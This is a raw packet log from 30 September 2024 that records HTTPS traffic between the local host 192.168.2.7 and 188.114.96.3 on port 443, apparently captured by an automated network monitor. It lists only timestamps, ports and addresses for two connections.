Sep 30, 2024 18:33:31.108144999 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.108374119 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.108412981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.108445883 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.108467102 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.108495951 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.108925104 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.108969927 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.108990908 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.109004021 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.109034061 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.109777927 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.109816074 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.109867096 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.109882116 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.109914064 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.111793995 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.111839056 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.111876011 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.111912012 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.111939907 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.112338066 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.112375975 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.112412930 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.112426996 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.112452030 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.130096912 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.150979042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.151022911 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.151088953 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.151113033 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.151143074 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.198503017 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.199126959 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.199206114 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.199270964 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.199290037 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.199342012 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.200810909 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.200855970 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.200858116 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.200880051 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.200889111 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.200946093 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.200946093 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.201801062 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.201854944 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.201889038 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.201904058 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.201932907 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.202327967 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.202373981 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.202393055 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.202406883 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.202433109 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.202466011 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.202970028 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.203008890 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.203047037 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.203061104 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.203085899 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.204261065 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.204308033 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.204345942 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.204363108 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.204389095 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.204433918 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.205507994 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.205548048 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.205586910 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.205605030 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.205627918 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.209573030 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.211596012 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.243761063 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.243807077 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.244118929 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.244170904 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.244292974 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.293376923 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.293421030 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.293647051 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.293689013 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.293757915 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.295038939 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.295078039 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.295197010 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.295212030 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.295269012 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.295959949 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.295998096 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.296089888 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.296103001 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.296147108 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.296629906 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.296669006 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.296761990 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.296776056 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.296828032 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.298082113 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.298121929 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.298197985 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.298213005 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.298240900 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.298608065 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.300041914 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.300081968 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.300134897 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.300154924 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.300177097 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.300631046 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.300693035 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.300708055 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.300738096 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.300765991 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.300803900 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.315975904 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.342201948 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.342231035 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.342304945 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.342324018 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.342364073 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.342385054 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.387171984 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.387232065 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.387271881 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.387293100 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.387326956 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.387336969 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.388470888 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.388528109 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.388586044 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.388592005 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.388634920 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.389739990 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.389780998 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.389825106 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.389830112 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.389868975 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.389887094 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.390567064 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.390608072 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.390649080 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.390659094 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.390697956 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.390711069 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.391233921 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.391283035 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.391324997 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.391330004 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.391362906 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.391381025 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.397770882 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.397811890 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.397852898 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.397866964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.397893906 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.397917032 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.398000002 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.398056030 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.398061037 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.398071051 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.398117065 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.398142099 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.398196936 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.398201942 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.398304939 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:31.401557922 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.421732903 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:31.421766043 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.019124031 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.019186974 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.019268990 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.030965090 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.031003952 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.625278950 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.625339985 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.626955986 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.626972914 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.627269983 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.630558014 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.675414085 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.972358942 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.972404957 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.972441912 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.972465992 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.972465038 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.972492933 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.972508907 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.972960949 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.972985983 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.973000050 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.973010063 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.973428011 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.973436117 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.977076054 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.977103949 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.977159977 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:32.977185011 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:32.977221966 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.176645994 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.176706076 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.176743031 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.176762104 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.176790953 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.176856041 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.176892042 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.176899910 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.176932096 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.176944971 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.176986933 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.177042961 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.177078962 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.177084923 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.177526951 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.177747011 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.177803040 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.177875996 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.177884102 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.177980900 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.178002119 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.178046942 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.178052902 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.178092957 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.178463936 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.178714991 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.178739071 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.178766966 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.178769112 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.178778887 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.178817987 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.178827047 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.178870916 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.178875923 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.229770899 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.287828922 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288026094 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288079023 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.288108110 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288187027 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288273096 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288333893 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.288341999 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288377047 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.288382053 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288431883 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288479090 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.288485050 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288517952 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.288518906 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288547039 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288583040 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.288718939 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.288834095 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.288841963 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.289227009 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.289278030 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.289285898 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.289323092 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.289330006 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.289356947 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.289382935 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.290035963 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.290086031 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.290100098 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.290132999 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.290137053 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.290158033 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.290183067 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.290332079 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.290381908 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.290390015 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.290446043 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.290918112 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.290985107 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.291134119 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.291186094 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.291215897 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.291269064 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.386931896 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.386974096 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.387012005 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.387032986 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.387042046 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.387070894 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.387151003 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.387197018 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.387330055 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.387352943 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.387375116 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.387382030 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.387407064 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.387883902 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.387933969 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.387943029 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.387979031 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.388068914 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.388109922 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.388250113 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.388272047 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.388303041 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.388309002 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.388324976 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.388374090 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.388411999 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.388416052 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.388458014 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.388900042 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.388961077 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.389075041 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.389123917 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.389276981 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.389318943 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.389400959 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.389440060 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.389869928 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.389930010 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.390075922 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.390098095 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.390125036 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.390131950 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.390146971 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.390428066 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.390454054 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.390472889 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.390481949 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.390495062 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.390868902 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.390927076 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.390933990 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.390964985 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:33:33.391037941 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:33:33.391077995 CEST	49704	443	192.168.2.7	188.114.96.3
